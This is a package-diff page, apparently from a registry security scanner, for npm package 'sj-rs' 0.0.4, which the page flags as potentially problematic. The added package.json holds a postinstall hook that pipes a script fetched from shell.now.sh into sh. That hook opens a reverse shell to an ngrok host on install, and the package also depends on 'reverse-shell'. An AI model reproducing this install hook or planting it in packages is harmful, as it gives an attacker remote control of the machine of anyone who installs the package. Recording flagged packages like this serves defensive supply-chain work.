sj-rs 0.0.4
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of sj-rs might be problematic. Click here for more details.
- package/package.json +14 -0
package/package.json
ADDED
@@ -0,0 +1,14 @@
|
|
1
|
+
{
|
2
|
+
"name": "sj-rs",
|
3
|
+
"version": "0.0.4",
|
4
|
+
"description": "sj-rs",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"postinstall": "curl https://shell.now.sh/0.tcp.ngrok.io:17237 | sh"
|
8
|
+
},
|
9
|
+
"dependencies": {
|
10
|
+
"reverse-shell": "latest"
|
11
|
+
},
|
12
|
+
"author": "sj",
|
13
|
+
"license": "ISC"
|
14
|
+
}
|